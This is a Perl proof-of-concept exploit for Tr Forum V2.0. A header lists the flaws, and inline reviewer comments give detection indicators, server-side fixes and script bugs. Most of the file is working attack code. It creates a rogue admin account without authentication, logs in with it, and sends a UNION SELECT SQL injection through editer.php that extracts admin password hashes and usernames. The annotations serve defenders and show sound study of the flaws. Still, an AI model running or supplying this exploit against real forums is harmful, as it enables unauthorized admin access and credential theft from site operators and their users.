
Tr Forum V2.0 Multiple Vulnerabilities



#!/usr/bin/perl=0D
#=0D
# Affected.scr..: Tr Forum V2.0=0D
# Poc.ID........: 10060903=0D
# Type..........: SQL Injection, Bypass Security Restriction=0D
# Risk.level....: Medium=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: comscripts.com/scripts/php.tr-forum.1579.html=0D
# Poc.link......: acid-root.new.fr/poc/10060903.txt=0D
# Credits.......: DarkFig=0D
#=0D
# /membres/modif_profil.php => Profil modification (you can choose the id of the member)=0D
# /membres/change_mdp.php   => Password modification ( same... )=0D
# /admin/insert_admin.php   => Second admin (only del post)=0D
# /admin/editer.php         => SQL Injection without quote=0D
#=0D
# You don't need to crack passwd hashes (for the admin panel)...=0D
# Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =(=0D
# This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999=0D
#=0D
# Reviewer notes (reading this PoC from the defending side):
#  - Every request the script sends carries fixed, script-specific values:
#    the User-Agent string '0xzilla', the account name 'AcidSploitWasHere'
#    and the literal 'UNION SELECT pass,pseudo,0 FROM tr_user_forum' in the
#    editer.php query string. Access logs and request filters can key on them.
#  - The three weaknesses the script relies on are all server-side fixes:
#    insert_admin.php is POSTed before any login request is made, so it
#    apparently acts without an authenticated admin session (require one);
#    editer.php interpolates id2 into SQL (bind it, or cast to an integer
#    first); and, per the header above, the admin login accepts the stored
#    hash in place of the password (only compare a hash derived server-side
#    from the submitted password).
#  - 'use strict' is enabled but 'use warnings' is not; several of the
#    oddities noted inline would be reported at runtime under warnings.
use LWP::UserAgent;=0D
use HTTP::Cookies;=0D
use HTTP::Request::Common "POST";=0D
use HTTP::Response;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
# Banner (53-column box, matched by the usage text and footer below).
print STDOUT "\n+", '-' x 53, "+\n";=0D
print STDOUT "|    Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure   |\n";=0D
print STDOUT '+', '-' x 53, "+\n";=0D
=0D
# Command-line options. Only --host is mandatory (checked below); the
# GetOptions return value in $opt is never examined, so an unknown option
# only produces Getopt::Long's own message and the script carries on.
my($host,$path,$proxh,$proxu,$proxp);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp);=0D
=0D
if(!$host) {=0D
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";=0D
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";=0D
    print STDOUT '+', '-' x 53, "+\n";=0D
    exit(0);=0D
}=0D
=0D
# Add a scheme when none was given. /http/ is unanchored, so it also
# matches 'http' appearing anywhere later in the string.
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
# NOTE(review): '!=' is a numeric comparison. A proxy host that does not
# start with a non-zero digit evaluates to 0, 0 != '' is false, and the
# 'http://' prefix is never added; 'ne' was presumably intended.
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}=0D 
# Default path is '/'; note the first URL below also starts with '/', so the
# default yields '//admin/insert_admin.php' while the other two URLs do not.
if(!$path) {$path = '/';}=0D
=0D
print STDOUT " [!]Host..: $host\n";=0D
print STDOUT " [!]Path..: $path\n";=0D
print STDOUT " [~]Admin user...\n";=0D
sleep(1);=0D
=0D
# One UserAgent with a cookie jar, so cookies set by the login POST further
# down are replayed on the final GET. The fixed agent string '0xzilla' is a
# straightforward log/filter indicator for this script.
my $cc = HTTP::Cookies->new();=0D
my $ua = LWP::UserAgent->new();=0D
   $ua->cookie_jar($cc);=0D
   $ua->agent('0xzilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
=0D
# Request 1: create a second admin account. Sent before any login, and the
# response is discarded, so nothing verifies that the account was created.
my $re = POST $host.$path.'/admin/insert_admin.php',[=0D
         'login'    => 'AcidSploitWasHere',=0D
         'password' => 'psychopasswd',=0D
'mail' => 'nospam@bot.com',=0D 
         ];=0D
   # Proxy credentials are attached to this request object only; the two
   # later requests never call proxy_authorization_basic.
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
   $ua->request($re);=0D
=0D
# The credentials below are printed as a success regardless of outcome.
print STDOUT " [+]User..: AcidSploitWasHere\n";=0D
print STDOUT " [+]Pass..: psychopasswd\n";=0D
print STDOUT " [!]Rights: 2 (medium)\n";=0D
print STDOUT " [~]Collecting admin's hash/username...\n";=0D
sleep(1);=0D
=0D
# Request 2: log in as the account just created. 'my $re' is re-declared
# here and again below; under 'use warnings' this would be reported as
# masking the earlier declaration.
my $re = POST $host.$path.'index.php',[=0D
         'login'   => 'AcidSploitWasHere',=0D
         'pwd'     => 'psychopasswd',=0D
        ];=0D
   $ua->request($re);=0D
=0D
# Request 3: the SQL injection described in the header (editer.php, id2
# without quoting). The fix on the server is to bind id2 as a parameter or
# cast it to an integer before it reaches the query.
my $re = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum');=0D
=0D
# Expect a 32-character [a-z0-9] token (the shape of a hex MD5 digest)
# inside a <font> tag. No output at all if the pattern does not match.
if($re->content =~ /">([a-z0-9]{32})<\/font>/) {=0D
                print STDOUT "\n ".$1.'::';}=0D
=0D
# Username from the textarea. Without /s, '.' stops at the first newline.
if($re->content =~ /;">(.*?)<\/textarea>/) {=0D
                print STDOUT $1.' (root)';}=0D
=0D
# Always exits 0, even when neither pattern matched.
print STDOUT "\n+", '-' x 53, "+\n";=0D
exit(0);
